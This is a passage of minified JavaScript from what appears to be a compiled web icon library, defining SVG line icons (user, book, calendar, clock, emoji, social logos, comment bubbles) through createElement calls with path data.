24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4.5 20.533A6.533 6.533 0 0 1 11.033 14h1.934a6.533 6.533 0 0 1 6.533 6.533.467.467 0 0 1-.467.467H4.967a.467.467 0 0 1-.467-.467Z"})),author_user_human_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 8a4.5 4.5 0 1 1-9 0 4.5 4.5 0 0 1 9 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 20.5a8 8 0 1 0-16 0"})),author_user_human_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 21v-3a4 4 0 0 1 4-4h8a4 4 0 0 1 4 4v3"})),author_user_human_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13.5c-3.283 0-6.156 1.585-7.728 3.776C2.984 19.07 4.791 21 7 21h10c2.209 0 4.015-1.93 2.727-3.724C18.155 15.086 15.283 13.5 12 13.5Z"})),book_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.5 18.5v-3.092a3 3 0 0 1 .504-1.664l1.219-1.828a.934.934 0 0 1 1.554 0l1.22 1.828a3 3 0 0 1 .503 1.664V18.5m-5-2.5h5"})),book_reading_time_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 19h9M4 19V7a3 3 0 0 1 3-3h3M4 19a3 3 0 0 0 3 3h11M4 19a3 3 0 0 1 3-3h11v-4"}),(0,a.createElement)("circle",{cx:"14.5",cy:"7.5",r:"5.5",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 5v3l2 1"})),calendar_date_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18M8 13.5h.01M8 17h.01M12 13.5h.01M12 17h.01M16 13.5h.01M16 17h.01"})),calendar_date_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15v16a2 2 0 0 1-2 2H8a2 2 0 0 1-2-2v-1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15l-3.595 13.032a2 2 0 0 1-1.928 1.468H3.313a1 1 0 0 1-.964-1.266L6 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 13.5 12.5 8l-2 1m-1 4.5h3m4-12-.5 3m-2.5-3-.5 3m-2.5-3-.5 3"})),calendar_date_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18"})),calendar_date_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM7.5 2v3M12 2v3m4.5-3v3M8 13.5h.01M8 10h.01M8 17h.01M12 13.5h.01M12 10h.01M12 17h.01M16 13.5h.01M16 10h.01M16 17h.01"})),caret_up_top_triangle_angle_arrow_upward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.8 6.067a1 1 0 0 0-1.6 0l-7 9.333A1 1 0 0 0 5 17h14a1 1 0 0 0 .8-1.6l-7-9.333Z"})),category_book_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 11h-5v3h5M7.5 15.5h3m-3 3h3"})),category_file_documents_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 7H5a2 2 0 1 1 0-4h16v6.5L19.5 11v7h-3"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5v16h13.5V7m-10 7.5h3m-3 3h3"})),category_file_documents_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 20h16a1 1 0 0 0 1-1V8a1 1 0 0 0-1-1H6a1 1 0 0 0-1 1v12Zm0 0H4a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h11.172a2 2 0 0 1 1.414.586L19 7"})),category_file_documents_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 20H6a1 1 0 0 1-1-1v-8a1 1 0 0 1 1-1h7.586a1 1 0 0 0 .707-.293l2.414-2.414A1 1 0 0 1 17.414 7H21a1 1 0 0 1 1 1v11a1 1 0 0 1-1 1Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M20 7V5a1 1 0 0 0-1-1h-3.586a1 1 0 0 0-.707.293l-2.414 2.414a1 1 0 0 1-.707.293H3a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h2"})),category_file_documents_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20V5a1 1 0 0 1 1-1h5.586a1 1 0 0 1 .707.293L11.5 6.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 6.5h10a2 2 0 0 1 2 2V11M6 11l-4 9h16l4-9H6Z"})),clock_reading_time_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 6v6l4 2"})),clock_reading_time_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M12 2v1.5M2 12h1.5M12 22v-1.5M22 12h-1.5M13 13 9.5 9.5M11 13l5-5"})),clock_reading_time_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 13.5V16a6 6 0 0 1-6 6H2v-7a6 6 0 0 1 6-6h1"}),(0,a.createElement)("circle",{cx:"15.5",cy:"8.5",r:"6.5",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.111V9l2 1.111M6 15h3m-3 3h7"})),confused_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 10v1.5m7-1.5v1.5M9 17c.778-.839 3.267-2.516 7-1.845"})),correct_save_check_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 12.5 2.5 2.5L16 9"})),correct_save_check_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.5 13 5 5 10-12"})),cross_close_x_minimize_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 8 8 8m0-8-8 8"})),cross_x_close_minimize_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m6 6 6 6m0 0 6 6m-6-6 6-6m-6 6-6 6"})),desktop_monitor_computer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 3H4a2 2 0 0 0-2 2v10a2 2 0 0 0 2 2h16a2 2 0 0 0 2-2V5a2 2 0 0 0-2-2ZM8 21h8m-4-4v4m0-7.5h.01"})),dot_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2C6.477 2 2 6.477 2 12s4.477 10 10 10 10-4.477 10-10S17.523 2 12 2Z",clipRule:"evenodd"})),download_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 15v4c0 1.1.9 2 2 2h14a2 2 0 0 0 2-2v-4m-4-6-5 5-5-5m5 3.8V2.5"})),download_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 13v8m0 0-2.5-2.5M12 21l2.5-2.5"})),facebook_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M16.5 8H14a2 2 0 0 0-2 2v11m-2-7h5"})),google_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m21.882 10.459-.103-.428h-9.485v3.938h5.667c-.588 2.741-3.318 4.184-5.549 4.184-1.623 0-3.333-.67-4.465-1.746a6.25 6.25 0 0 1-1.4-2.021 6.152 6.152 0 0 1-.502-2.393c0-1.66.76-3.318 1.865-4.41 1.106-1.091 2.776-1.702 4.437-1.702 1.902 0 3.264.99 3.774 1.442l2.853-2.784C18.137 3.818 15.838 2 12.254 2 9.49 2 6.84 3.039 4.903 4.933 2.99 6.8 2 9.497 2 12s.937 5.066 2.79 6.946C6.77 20.952 9.574 22 12.46 22c2.627 0 5.117-1.01 6.892-2.842 1.745-1.803 2.647-4.3 2.647-6.915 0-1.101-.113-1.755-.118-1.784Z"})),growth_increase_up_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m20.2 7.8-7.7 7.7-4-4-5.7 5.7"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 7h6v6"})),hamicon_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 6a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 20a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),hamicon_6_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0-7a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0 14a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),happy_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8v1.5m7-1.5v1.5M12 18a5 5 0 0 0 5-5H7a5 5 0 0 0 5 5Z"})),heart_love_wishlist_favourite_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.098 13.848 7.52 7.519a.542.542 0 0 0 .765 0l7.52-7.52a5.678 5.678 0 0 0 0-8.028 5.047 5.047 0 0 0-7.138 0l-.711.71a.076.076 0 0 1-.107 0l-.711-.71a5.047 5.047 0 0 0-7.138 0 5.678 5.678 0 0 0 0 8.029Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.334 7.48c.553 0 1.107.21 1.53.633.547.548.78 1.292.695 2.006"})),hemicon_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h16"})),hemicon_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h16M4 19h16"})),hemicon_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h8"})),hidden_hide_invisible_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.862 5.999c-1.61-1.148-3.576-2-5.86-2-7 0-11 8-11 8s1.764 3.529 5 5.899m3 1.596a9.213 9.213 0 0 0 3 .505c7 0 11-8 11-8s-.867-1.734-2.5-3.587"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14 9.764A3 3 0 0 0 9.764 14m5.21-1.601a3.002 3.002 0 0 1-2.59 2.577M3.6 20.4 20.4 3.6"})),home_house_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.671 9.403 7-6.222a2 2 0 0 1 2.658 0l7 6.222A2 2 0 0 1 21 10.898V19a2 2 0 0 1-2 2h-3.5a1 1 0 0 1-1-1v-5a1 1 0 0 0-1-1h-3a1 1 0 0 0-1 1v5a1 1 0 0 1-1 1H5a2 2 0 0 1-2-2v-8.102a2 2 0 0 1 .671-1.495Z"})),hourglass_timer_time_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 2v4.93a2 2 0 0 0 .89 1.664l4.555 3.036a1 1 0 0 0 1.11 0l4.554-3.036A2 2 0 0 0 18 6.93V2M6 22v-4.93a2 2 0 0 1 .89-1.664l4.555-3.036a1 1 0 0 1 1.11 0l4.554 3.036A2 2 0 0 1 18 17.07V22"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 2h16M4 22h16M9.5 19.5h5M11 17h2"})),instagram_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"4",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"2",d:"M17 7h.01"})),laptop_computer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 6a2 2 0 0 1 2-2h13a2 2 0 0 1 2 2v10h-17V6Zm7 1h3M2 16h20v2a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2v-2Z"})),left_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M3 21h8m-8-6h18M3 9h8"})),left_triangle_angle_arrow_backward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.067 12.8a1 1 0 0 1 0-1.6l9.333-7A1 1 0 0 1 17 5v14a1 1 0 0 1-1.6.8l-9.333-7Z"})),linkedin_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M7.75 10.25v6"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"2",d:"M7.75 7.75h.01"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M11.25 10.25v6m5 0v-3.5a2.5 2.5 0 0 0-5 0"})),link_chains_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m14.011 17.028-2.514 2.514a4.977 4.977 0 1 1-7.04-7.04L6.973 9.99M9.99 6.973l2.514-2.514a4.978 4.978 0 1 1 7.04 7.04l-2.515 2.513M9.5 14.5l5-5"})),location_gps_map_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"10",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 10.205C20 17.385 12 22 12 22s-8-4.615-8-11.795C4 5.674 7.582 2 12 2s8 3.674 8 8.205Z"})),long_arrow_up_top_increase_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21V3m0 0L6 9m6-6 6 6"})),mail_email_messege_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V6Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 8 4.8 3.6a2 2 0 0 0 2.4 0L18 8"})),media_document_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 21h14a2 2 0 0 0 2-2V8.828a2 2 0 0 0-.586-1.414l-3.828-3.828A2 2 0 0 0 15.172 3H5a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2ZM8 9h4m-4 3h8m-8 3h6"})),messege_comment_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 7v15l5-4h13a2 2 0 0 0 2-2V7a2 2 0 0 0-2-2H4a2 2 0 0 0-2 2Zm7 3h4m-4 3h6"})),messege_comment_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM9 9h4m-4 3h6"})),messege_comment_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM8 11v-1m4 1v-1m4 1v-1"})),messege_comment_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2Z"})),messege_comment_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 12a9 9 0 1 1 9 9H3v-9Zm6-1.5h6m-6 3h6"})),messege_comment_6_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 16a4 4 0 0 1-4 4H2v-6a4 4 0 0 1 4-4"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 9a5 5 0 0 1 5-5h6a5 5 0 0 1 5 5v7H11a5 5 0 0 1-5-5V9Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 8.5h4m-4 3h6"})),messege_comment_7_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 